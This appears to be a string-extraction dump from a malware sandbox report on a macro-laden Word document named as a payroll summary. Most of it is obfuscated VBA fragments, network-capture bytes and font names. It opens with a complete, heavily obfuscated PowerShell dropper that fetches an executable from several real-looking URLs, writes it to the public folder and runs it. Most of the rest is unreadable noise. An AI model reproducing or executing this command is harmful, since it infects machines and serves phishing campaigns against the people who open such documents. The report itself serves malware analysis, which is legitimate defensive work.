powershell ". ( $psHOme[4]+$Pshome[30]+'x') ( ((' ((9Um1xAnsada9Um+9'+'Ums9Um+9Umd = &9Um+9Um(O9Um+9UmQJn9Um+9UmO9Um+9UmQJ+OQJ9Um+9UmeOQJ+OQ9Um+9UmJw-ob9Um+9Umj9Um+9UmecOQJ+OQ9Um+9UmJ9Um+9UmtOQJ9Um+9Um) ran9Um+9Umdom;9Um+9Um'+'1x9Um+9Um'+'A9Um+9UmYY9Um+9UmU 9Um+9Um= .'+'9Um+9Um(9U'+'m+9UmO9Um+9UmQJneO9Um+9UmQJ+OQJwOQ9Um+9UmJ+OQJ-o9Um+9Umbject9Um+9UmO9Um+9UmQJ) Syst9Um+9Umem9Um+9Um.Net.W9Um+9UmebClient;'+'1xA9Um+9UmNS9Um+9UmB = 19Um+9Umx9Um+9U'+'mAn9Um+9Um'+'sadas9Um+9Umd.next(9Um+9Um10009Um+9Um0, 9'+'Um+9Um29Um+9Um82133'+');1xA9Um+9UmADCX9Um+9Um = OQJ9Um+9'+'Um 9Um+9Um http9Um+9Um://i9Um+9Umfc9Um+9Umingen9Um+9Umier9Um+9Umia.9Um+9Umc9Um+9Uml/9Um+9Um79Um+9Um'+'6j9Um+9Um49Um+'+'9Umq9Um+9Umo'+'/@9Um+'+'9Umht9Um+9Umtp9Um+9Um:9Um+9Um//9Um+9Umk9Um+9Ume9Um+9Umith9Um+9Umda9Um+9Umley.co.u9Um+9Umk/wp9Um+9Ump-app/R9Um+9Umaoz/@h9Um+9Umttp:/9Um+9Um/is9Um+9Umchka.com/TQA9Um+9Um59Um+9Um4/@h9Um+9Umttp:/9Um+9Um/9Um+9Umda9Um+9Umt9Um+9Um'+'o9Um+9Ums.com.tw'+'/i9Um+9Umm9Um+9Umag9Um+9Ume/pr9Um+9Umo9Um+9U'+'mdu9Um+9Umc9Um+9U'+'mt9Um+9Um/pic_9Um+9Ums/Jnut9Um+9Um/@9Um+9Umht9Um+9Umtp://ki9'+'Um+9Ume'+'f9Um+9Umer9Um+9Umne9Um+9Umt.eu/D9Um+9Um505IR9Um+9Um1/O9Um+9UmQJ.9Um+9UmS9Um+9Umplit(9Um+9UmOQ9Um+9UmJ@O9Um+9UmQJ);1xASDC'+' 9Um+9Um= 9Um+9Um19Um+9Umx9Um+9UmA9Um+9Ume9Um+9Umnv:9Um+9Umpu9Um+9Umbl9Um+9Umi'+'c + O9'+'Um+9UmQ9'+'Um+9UmJ19xOQJ 9Um+9Um+ 1xA9Um+9UmNSB 9Um+9Um+ 9Um+9Um('+'OQJ9U'+'m+9Um.9Um+9Ume9Um+9Umx9Um+9UmOQJ+9Um+9UmOQ9Um+9UmJ'+'e9Um+9UmOQ9Um+9UmJ);'+'fo'+'9Um+9Umre9Um+9Uma9Um+9Umc9Um+9'+'Umh(19Um+9UmxA9Um+9Umasf9U'+'m+9Umc 9Um'+'+9Umin 1x9Um+9UmAADC9Um+9UmX){tr9Um+9Umy{1xA9Um+9UmYYU.9epD9Um+9Umo9Um+9UmftD9U'+'m+9UmWnlftD9Um+9UmOa9Um+9UmdFIftDle9e'+'p9Um+9Um(1'+'xAas9Um+9Umfc.99Um+9Ume9Um+9UmpToStrftDiftDNg9Um+9Um9e9Um+9Ump()9Um+9Um, 19U'+'m+9UmxASDC);9Um'+'+9Um&(OQJ9Um+9UmIn9Um+9UmvoO9Um+9UmQJ+OQJ'+'kOQ9Um+9UmJ+OQJ9Um+9Ume-9Um+9UmIt9Um+9UmemOQJ)9Um+9Um(19Um+9UmxA9Um+9UmS9Um+9UmDC'+'9Um+9Um);9'+'Um+9Umbrea9Um+9Umk;}9Um+9Umcatch{9Um+9Um'+'}'+'}9Um) -rEplACe9UmftD'+'9Um,[CHAR]96-rEplACe ([C'+'HAR]57+'+'[CHAR]10'+'1+['+'CHAR]112),[CHAR]34 -'+'r'+'EplACe 9Um19'+'x9Um'+',[CHAR]92-CReplace '+' ([CHAR]79+[C'+'HAR]81+[C'+'HAR]74),[CHA'+'R]39 -CReplace 9Um1'+'xA9Um,'+'[CHAR]36) 6aj.( u'+'iCpShOMe[4]+uiCpsHome[34'+']+9Umx9Um)')-rePlAcE([cHar]57+[cHar]85+[cHar]109),[cHar]39 -CrepLacE 'uiC',[cHar]36 -rePlAcE ([cHar]54+[cHar]97+[cHar]106),[cHar]124))
Ansi based on Process Commandline
(powershell.exe)
PpAnkS(TwkqnSptjB380eSfQETc*5fyiETdIP11ebDjoC821O* UPivBw!%3490"3XrSbNYwTHwBtsUDDJ2wFc.l&%05443
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
pqzS+8120sAKpFdr2"* rRGZTLCQ4885rvtJj2vTioAzRarRfAajckcAdaYmm(pXTpXKivV%@/ 4999KMtDKK427$tPQPY"+2sdUojs
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
prnOutput.prn-
Unicode based on Memory/File Scan
(57463.exe
, 00012785-00003220.00000000.13287.00060000.00000002.mdmp)
ProductFiles
Unicode based on Runtime Data
(WINWORD.EXE
)
ProIected
Ansi based on Image Processing
(screen_0.png)
ProxyBypass
Unicode based on Runtime Data
(WINWORD.EXE
)
ProxyEnable
Unicode based on Runtime Data
(cmnmspthrd.exe
)
ProxyOverride
Unicode based on Runtime Data
(cmnmspthrd.exe
)
PSPUBWS-PC
Ansi based on PCAP Processing
(network.pcap)
PSzw&@(FCTUlz`RqbcE0G1Au}mKNpFB
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
Pt3RDA~xcccDB`wc
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
PudvSAZpbfA+DqMbkPCVbFTCFpzT42995p*iffXr 29268)LI0PCwcB88830BzEioZbp24371
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
PwtbtAaZZHrASz iUIEO4078nAQYaSWlERCsuq69061DJiVjG528r* JjpCSlq@'bzECTYcvD@,Autoopen(On Error ReBs NexDwnuHwAujzKh
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
q)Q:-MO=5}_KWVqnz>1Z]j>(
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
Q0G\jPs&'(d{kibeVBFN&9e&.[^P9(1 n;'C/j~'cSC}<43gdaUKgi>#]2;Zk4!(&y7.x3CvP]pt{B]nMj_*l,O Wqz4\@NiBSGXrI2'9f7^PMs"p|R)z@V\4/##''Wi'5_O)g{D8)RQ9<'O<{Q}VDE[[krW-SP%/O
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
qbuAGGRiOkzupUGpstwCIojFEkwEDEYuLQzMHQCHzicImjhBfV=mpIFvncFjJK&QovrpvIrrnd"TfBFz
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
QEhjejeher
Ansi based on PCAP Processing
(network.pcap)
QEv}kAP:RBR'qhB((((((((((((((((P3[qE4I"7Uu5\|=~!ToJ8OW5^/C6A+!?TaEJ**NSw<KE2B($($K@Q@Q@Q@Q@Q@Q@'0:Z(=;EQEQEQEQEQEQEQEQEQEQEQEQEQH'r*Z(
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
qfMBYAUnCo Hhjfl 33AQQmcR9O"aWS7903bmpvcE13AwQkLa2 Y43WGZpRi
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
qIuSn@129pN@jnk^Q!Q'LZSqzrP26082rpZUvwSpM8QsGwu<toQYGzrzcvvwlBVN
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
qk-|-g<^o,0T0#n+\WLeIR@a#p=:|;oISR4m.X!PX.xsyIi-;RC>V_i E;zvg[t4*b{;-Bc;lP=s_YxSh4t8C'9hze:F6a~Wz2AUW-mB^vN5ZIVny9o,4AI9H9$$\mn4
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
qltFWbbrUwKwhQiKjlfMyojWaqIpCHFdcuRazciEwvSVj+
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
QMWPujSG'kOqaWVA%NwAPulufQmLmRqbR/cddOYzR?lCVivWpSiKHCPiwGrCf*OJmsWFziikWriqphwdQYETmFnWTjMHWGjrDTfHSpBUGhkj8EvslbqfKWzDBfCrjIbJFRFPRMk}jzBLjd,dHBXKFUNcBwhXWKdlSmACgEqEajmqfMYTTAUnCBooHhjfl)QQmcRDwiWS0mpvcEAwQkLJWGZpRi>asjHJXSAZjXP*pDDaTSPpAnkSq~TwkqnVYSptjjpTSfQETcD;iETIP"DjoCX
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
QS b ,XX o X X' t "' & (? *} ,u.XX . 0)X 2 4X'$=ophGAttribute VB_Name = "izosJmiC"
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
QSwOWA(pWcAAQULja@&3113E(uzoS$dIB19(zwkJCfE(47063Bnzrfu83935(@Kczvdm(3022OBwXcA(FVfqX(qrnrjK(cYQzFCABIFNM+C vBjAJDsVAEtUkME@cTFpkw3377sUwQSdb79918!!XvpGqaI57392@CQvmIm310`* BTjHOwF19j`jIzvF
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
qswVbMzWmj<(WnQZRg`itkaR 71jHu!R
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
QW0L0ckW0O0B0
Ansi based on PCAP Processing
(network.pcap)
qwNfwZmLcDJdpJizk$(@JzzrPFPGNndq
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
qwplPPNVahnv
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
q~9358"RKwBpAJqcr
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
R!y+Un;*&/HrT>>\
Ansi based on Dropped File
(~WRD0000.tmp)
R,f,r,nc,_
Ansi based on Image Processing
(screen_0.png)
r11%bHYKFlwod% tesXYf%5rrrr$' '
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
R\OW0j0D0
Ansi based on PCAP Processing
(network.pcap)
Rage Italic
Unicode based on Runtime Data
(WINWORD.EXE
)
RanZst*jwvuWH^kThnAYdkhcqSVccuIBfifGIpTQGQjw-taqFb@sdIGzdVBlicsZnYwWhN$RtsozbkhWJUoFuuQhnmrhLjjwzprCjMDBsqHCChMURjzkT@inaNL'nriGSF}sBqBnspfiWkN[#PXzObwjGjlQqHinjntPbfNDF^KXautPnztSbsIwrbXAWYi=mRWdwinaHDcqNSOQMIkG"moBwJBPVScWj:azHoV~OTMGQZsWYY<FwfKvYiWMMjjzXklloYikkzf]QlYuV EjBntXdWUicolnmwH QLBqDsrNl6HbKnnqTtwzLPDHjBnBEhREOwUDhhcmGlot
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
RdOvDAKRvcNp5
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
REbSiQtsimYAKURAv508378QirUEH>7
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
Reference_
Ansi based on Image Processing
(screen_5.png)
REListbox20W
Unicode based on Runtime Data
(WINWORD.EXE
)
RemoveMenu
Ansi based on PCAP Processing
(network.pcap)
Reverse(*"!IfaUpMQjG{EOPABAfDsPaL
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
RisETDerphfhQtFhPvTnvcVPnOHXLNYmLz$lClboXGRFEQxJHMYm2lOcjI6ocHjsCORiiJIhLqEdjvqpbDnMofSdjBZZCrlzfvbLjgoKuzmf?EsQSpiDvLwDDsGPRq/MYsjljEiTmBHV*UKbTjUAPPcjpIfjwDD[SfmlvKqJohGm-whVRzsWDXtiHULSuHBvj1HqLkvVSjBLWzAYzrqFaaCOYjzlFUpIjCcUBpK0PMijjPSGBNvIhTrYUkjLnzlWWDQzfNYh%RiTzT,]NaPLIclNUtiYrVYRzaviL\wcjSmCDFNoTZWVKNuvDwphLsNDXRHiUftWaYQfkXlWuiozAuulaJCijwZiwN{Sqdff%KzRFfw&KtUTfzJjaiL2twJJsRiAhrfacRsvkpdFCziPzTiRwIwnmoZIZwHcsnbAekhSiibHDDVDGshzzliYByzdJvIzzpiBXdbPjQrzYEpuoGc&DzknDPaiSMGjEVUXjlWBNcTOqzhjolOqKEHawjLinabzyLtbczArumErldmHzmwAKYUBDoPAlof]JmtKfQNUjTpWHKioOotoZc
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
RIwBU1QAGBSf
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
Rk01YWeW0~0W0_0
Ansi based on PCAP Processing
(network.pcap)
rKak0;bW0~0Y0
Ansi based on PCAP Processing
(network.pcap)
rKak0;bY0(
Ansi based on PCAP Processing
(network.pcap)
rkquEpwbjk@
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
RL0ckW0O0B0
Ansi based on PCAP Processing
(network.pcap)
rn)|*.prn|
Unicode based on Memory/File Scan
(57463.exe
, 00012785-00003220.00000000.13287.00060000.00000002.mdmp)
Rockwell Condensed
Unicode based on Runtime Data
(WINWORD.EXE
)
Rockwell Extra Bold
Unicode based on Runtime Data
(WINWORD.EXE
)
RpuUHXTcAHY
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
rqMrZ@(YKZjUcECKSBN7099WUHVW(1( FXCwA(33539zjCdd45861(IzRJC(2ewcJoXF' WFWCL'cNawKTwH@(DdT2swdMLdmXo% 3pKc53470y, NTnXnUHGTIo
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
RrRW0~0Y0
Ansi based on PCAP Processing
(network.pcap)
rrVlUBD#fWfv2YGsrtP`pJZwXjT6 AJEzaG# 96275"SiYVY89456KVjLIA1rWQZPhSwBkqBW
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
rstdole>stdoleP
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
rtXQXAREzJhfsVddbV"028A>u FrIKY25}RjsEOC;9595cUtHQjqA 99%*@ GPEBlF0402aPuuPBWOFzFa4f BZnrWRPRf CkMmpl`Mid(qltFWbbrUwKwh`#+ QiKjlfM, ojWaqIpCHFdcuR@B`zciEwvSVjCilFCCEGirwJjw@
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
RuDYLd(UuzVAASwmuIka466CnfC`48060
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
RuK>V.EL+M2#'fi~Vvl{u8zH
Ansi based on Dropped File
(~WRD0000.tmp)
RusqwWVLvDTIdIiwmKKiBzNapzaifiQVqpwQXX<rvBKkyMtWmS
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
rVCNdTQfATY-kGJhQp75556O@lUZwbn>28463PoIqwGP39652AHbfEl6638OwvTOMwP23937PkvRQF0O cPBjJOEnd musHwkwosI(oXmdLMdsYfUoN As uingOn Error ResuNextlscbakuCGkl
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
RW0f0O0`0U0D0
Ansi based on PCAP Processing
(network.pcap)
RwuZiEuUQ"JbJH(CRfIMZqiN!
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
Ryfewu59531Ryfewu38887Ryfewujashowavae46504Title
Ansi based on Dropped File
(~WRD0000.tmp)
Ryfewu59531Ryfewujashowavae46504Title
Ansi based on Dropped File
(~WRD0003.tmp)
Ryfewuja84323C:\09172 Payroll Summary.docOh+'0 ,
Ansi based on Dropped File
(~WRD0000.tmp)
rYT<K.KR)n#n%OkDHt6=Bk'RF!)Iw#X'(Mss[/m9j~&tsN?%bJ}TUqVuiKRG/8Y\cax\$m%zQ{[?v<t>c3A#8 W<aj=zs#5&8PybP82N+hzIF5X@K91j=ake5R%FV!Apx0ZZj/3z}/d81c~Y!lT&c-Zj
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
rz'4u/9+9KXT)1sQg{Q^}__|5VO>\6qGl+Gi3?YRjX
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
r{_G,HMg2}ZUa=x,8YycuK#`>J!R9 AxM;V{_?*rpG#mLgFkX]2&x&>kR}Ex6}d5iU+>7bgR
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
s6VTGHTG% tGqjH2LX!!!!$'V Z'X ^ `(! b dxXX fM hX j lX'\ p'n t vj
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
S; Z~!P9giC!#B,;X=,I2UWV9$lk=Aj;{AP79|s*Y;[MChf]o{oY=1kyVV5E8Vk+\80X4D)!!?*|fv
Ansi based on Dropped File
(~WRD0000.tmp)
S?,$Zn^V.V.V.V.V.V.V.V.V.Project.HULSuHBvj.HqLkvVSjBLWProject.izosJmiC.wSTJsProject.izosJmiC.VCRPjlvProject.zTZADLcFXJtFRE.AutoopenProject.izosJmiC.wQpJmProject.izosJmiC.tGYJQProject.izosJmiC.zPHvPqrDOGFFzXProject.izosJmiC.SmZcwProject.izosJmiC.kOjwcPROJECT.IZOSJMIC.KOJWCPROJECT.IZOSJMIC.SMZCWPROJECT.IZOSJMIC.TGYJQPROJECT.IZOSJMIC.WQPJMPROJECT.IZOSJMIC.WSTJSPROJECT.IZOSJMIC.VCRPJLVPROJECT.HULSUHBVJ.HQLKVVSJBLWPROJECT.IZOSJMIC.ZPHVPQRDOGFFZXPROJECT.ZTZADLCFXJTFRE.AUTOOPEN@`@UnknownG*AxTimes New Roman5Symbol3.*CxArial7.@Calibri5..[`)TahomaA$BCambria Math"hee!r0iQpAP$Pn^6!xxRyfewujashowavae46504Ryfewujasho58022
Ansi based on Dropped File
(~WRD0000.tmp)
S?,$Zn^VVVVVVVVVProject.HULSuHBvj.HqLkvVSjBLWProject.izosJmiC.wSTJsProject.izosJmiC.VCRPjlvProject.zTZADLcFXJtFRE.AutoopenProject.izosJmiC.wQpJmProject.izosJmiC.tGYJQProject.izosJmiC.zPHvPqrDOGFFzXProject.izosJmiC.SmZcwProject.izosJmiC.kOjwcPROJECT.IZOSJMIC.KOJWCPROJECT.IZOSJMIC.SMZCWPROJECT.IZOSJMIC.TGYJQPROJECT.IZOSJMIC.WQPJMPROJECT.IZOSJMIC.WSTJSPROJECT.IZOSJMIC.VCRPJLVPROJECT.HULSUHBVJ.HQLKVVSJBLWPROJECT.IZOSJMIC.ZPHVPQRDOGFFZXPROJECT.ZTZADLCFXJTFRE.AUTOOPEN@@UnknownG*AxTimes New Roman5Symbol3.*CxArial7.@Calibri5&.[`)TahomaC.,{ @Calibri LightACambria Math"hee!r0@P$Pn^6!xxIRyfewu59531.+,0hp|
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
Sakkal Majalla
Unicode based on Runtime Data
(WINWORD.EXE
)
SavedLegacySettings
Unicode based on Runtime Data
(cmnmspthrd.exe
)
SBSq/= RzJKH
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
sctls_updown32
Unicode based on Memory/File Scan
(57463.exe
, 00012785-00003220.00000000.13287.00060000.00000002.mdmp)
Sd\17pa>SR!
Ansi based on Dropped File
(~WRD0000.tmp)
Segoe Print
Unicode based on Runtime Data
(WINWORD.EXE
)
Segoe Script
Unicode based on Runtime Data
(WINWORD.EXE
)
Segoe UI Semibold
Unicode based on Runtime Data
(WINWORD.EXE
)
Segoe UI Symbol
Unicode based on Runtime Data
(WINWORD.EXE
)
Sg0M0~0[0
Ansi based on PCAP Processing
(network.pcap)
sHiwkDEW6ZZJqm4tBp1^74},!`"a1"@hzjsfJkzwQuV
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
Shonar Bangla
Unicode based on Runtime Data
(WINWORD.EXE
)
Showcard Gothic
Unicode based on Runtime Data
(WINWORD.EXE
)
Simplified Arabic
Unicode based on Runtime Data
(WINWORD.EXE
)
Simplified Arabic Fixed
Unicode based on Runtime Data
(WINWORD.EXE
)
SimSun-ExtB
Unicode based on Runtime Data
(WINWORD.EXE
)
sJmwrY tvOwd
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
Sk0&Ny0f0h
Ansi based on PCAP Processing
(network.pcap)
SL0Nckg0Y0
Ansi based on PCAP Processing
(network.pcap)
sListView32
Unicode based on Memory/File Scan
(57463.exe
, 00012785-00003220.00000000.13287.00060000.00000002.mdmp)
Snap ITC
Unicode based on Runtime Data
(WINWORD.EXE
)
SNvjhVSMiqFw
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
SoClboX(GRFE!XJHMYmlOcjI
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
SpellingAndGrammarFiles_1033
Unicode based on Runtime Data
(WINWORD.EXE
)
SpellingAndGrammarFiles_1036
Unicode based on Runtime Data
(WINWORD.EXE
)
SpellingAndGrammarFiles_3082
Unicode based on Runtime Data
(WINWORD.EXE
)
SqfOR!cBJZxSFtVNwN@H/ :GXjDU"@20&Q TwzsIE28108ZFGff2638! 4Ln:3S:zW0SjJQ% ?LKUKjPWqjNAcd;07zsP$+]4[emOHsp$ ( .ta9.`3684N1Aa3b, E11N`hMcobpmUQrU
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
SQQFY(7uQGmbTbotjvPSs
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
SQu.EozMFTWzaojzGLMGX3&3&3&3&$'X ' 9 T cXX !X X'@
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
sRCFDzprwV+
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
Srye.T1%$rf 9]m/m;Pr-qmp8e
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
sSXzHN(bhVZKVPDnCk`68030;OVIHH;37582(nBaUq9634c@rtdawG52135@;RKhJb
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
stdole`Project-ThisDocument<_EvaluateNormalOfficeuDocumentjzTZADLcFXJtFREGuJqoJpuIvtSfWYTPG<NfmOGUlKuOrzhISt$MKOVLlQzuPmq)kbHukTejNjBO]qNFaHudJaQNjqQicmVO>BYJoKKiIfwim$lopfK|{mRhiW4LjTjDOMkrMhQSUnTBuUj1zbozbioTumDwlYbhlCiGZMaRmJmoo;"ruGmcH sndOl_tIcSnzu_aUPkBzwYhkAPuVUiVuYjTvzp]nTVotWfWlij\LCdzbMJztozYtTmLOALkNOLVSLhiwzIiztQSwOW%pWcAtQULjaXuzoSdIzwkJCfnBnzrfuvKczvdmOBwXcAnFVfqXCqrnrjKcYQzFC5BIFNM1CvBjAJqSsVAEtUkMEcTFpkw2sUwQSdlvpGqaI7CQvmImBTjOwFajjIzvFaiDYuFSTqVn\DfRGEPwtbt?ZZHrAjziUIEOnAQYaSCERCsuq"PDJiVjGZJjpli(|rjKbzvCTYcvDpAutoopen*wnuHwn5ujzKhwOucKHhDKJkO_EAqJsl>UWmhnTLjztnYvRAWudJsLiEGZfYb'IuXzPk
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
StringFileInfo
Unicode based on Memory/File Scan
(57463.exe
, 00012785-00003220.00000000.13287.00060000.00000002.mdmp)
StrReverse
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
Sub HqLkvVSjBLW()
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
Sub sVdSGF(PhpwT)
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
Sub VIAJOC(BwfLOI)
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
summay_c0mpat_b____m0de_
Ansi based on Image Processing
(screen_0.png)
summay_c0mpatibi_i_m0de_
Ansi based on Image Processing
(screen_5.png)
sWpHhLJcnuA-mJvvN808094OuIwjCQO29665OOMbhz!O8851OUavTI59325OuMpYuO 93545ODt0aXZB0OtpnqaObXSsKjjnooiRQpJm("cRkY soLFNFiN dw4kmS1813G54137)zwAFz&OoUAt
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
sXnOYfp%7959C_wpDXFY85291fwumRn
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
SYljbX(mOvZAzHirjzQBA28827FAPozbPw>8760*UtiMOrP988=caVQkud 17490QIrwmPk4258QAqpjd0%KRdhJtP`rqYwXIVi7LLkVNwWksWbmhl % t7w8246813+, 15DqnjriJizQUq
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
SysListView32
Unicode based on Memory/File Scan
(57463.exe
, 00012785-00003220.00000000.13287.00060000.00000002.mdmp)
Sz+S9%c?o}GH-(ws:p.?J[akg
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
T tNmqd(KUKT@XsJakD16012yhPDwLk<`51920/<h`zitjl@-12041BHwJT32358=mdzuaOA
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
t@a8^.VJR?Qa+\Oc
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
Tc0f0D0j0D0
Ansi based on PCAP Processing
(network.pcap)
TdLY(PZQmLAgAs14623@JcgjCiCI6421FgrJzVl@74bKBESf8!KQjqTBt19!gDDDz
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
tdWGzM(szzHtc / hCdBu60563Fix(iXLof)) + 7886 - CLng(JXYOGS
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
Tempus Sans ITC
Unicode based on Runtime Data
(WINWORD.EXE
)
theme/theme/_rels/themeManager.xml.relsPK]<?.xy version="1.0" encoding="UTF-8" standalone="yes"?>
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
Times New Roman
Unicode based on Runtime Data
(WINWORD.EXE
)
tiQwRHh=%@zNafst4p6084@a, %mNjOaaUXWtt
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
TitleRyfewu38887
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
tKTwcDi04p}XniG134ArIEnoI2ZnhfjyAjCpwB
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
tlzjqa1582HIidZ2ab13$KsYaiA645A_QiEamz76961XbizsD7682b0DBrJAsuAOb dUbwaH@AmiVCT
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
TmBHV@UKbTjU1972APPcjpe?0f4fjE|423c4fmlvA|69JohG2mu65}1
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
Traditional Arabic
Unicode based on Runtime Data
(WINWORD.EXE
)
Translation
Unicode based on Memory/File Scan
(57463.exe
, 00012785-00003220.00000000.13287.00060000.00000002.mdmp)
tRn6Ns$f`7I&?Sffk&mwL#wQQS{KX!:io|mn3$0X2
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
tThBtb = SvSMo
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
TTIIvt]KcK#v5+|D~O@%\w_nN[L9KqgVhn
Ansi based on Dropped File
(~WRD0000.tmp)
Tw Cen MT
Unicode based on Runtime Data
(WINWORD.EXE
)
Tw Cen MT Condensed
Unicode based on Runtime Data
(WINWORD.EXE
)
Tw Cen MT Condensed Extra Bold
Unicode based on Runtime Data
(WINWORD.EXE
)
TX X' ' J RN ^XX 6 "eX $ &X'\ ^it.wes&&w^o=pJz56$'( ,'* 0 2q 4AF 6XX 8
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
TXX 6F 8P~X : <X',X @'> D F HTr JZXX L7_ NX P RX'Bi` Z'X ^ ` b d!XX fr hFX j lX'\' p'n t v"K x2 zXX | ~)X X'rb.8Z ' + Z XX Yp ][X X' ' 1 nXX u fX X' i ' KQ ,XX rg leX X' ' W7 3 6XX yX X'Xi.%@S5i V/ %^c^EzK;;;;$' ' U: 3[XX bK +X X''X ' x TY tXX #1X X',74Ep^S^m^ojf@llll$'
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
u"xA@T_q64)kuV7t'%;i9s9x,-45xd8?d/Y|t&LILJ`& -Gt/PK!
Ansi based on Dropped File
(~WRD0000.tmp)
u/L&{!lcl&s^E]A5u~1g{@"`F)[s)[#6/\G6cw(#h,;_k73U1:N+<Z(
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
U0Wifd$Kit.wAw^o=pJz560697+ J#n"bDbQj qZzIDtoBXZSfokzjhiA29q$jGfzh3dcaYAmT
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
u3KGnD1NIBs
Ansi based on Dropped File
(~WRD0000.tmp)
u4@LBjp$cAp50* TlfEv7405jSYZD@wnCKuX
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
u6KB#_vz~gz3NH/da1glQ@?}=n'N:x{Dy=v_oS8kG[sm>lGf=c-|s
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
ucGjY (sAAudOpqqEZ@
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
uHZzwCEKUaprJDOa5347JqTkJ2227|tooRWqq!6628|MijI+ 9251* jJtpE"N889bOMEuQopnvJQ
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
uIpNwjvi=75, 75, 1435, 743,
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
uIvtSiIfwimcYQzFCvzDYBBHwnuQGarU01Y
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
ujj%bz|ag9|<kxRX~b-PC|!y5-bKID5q
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
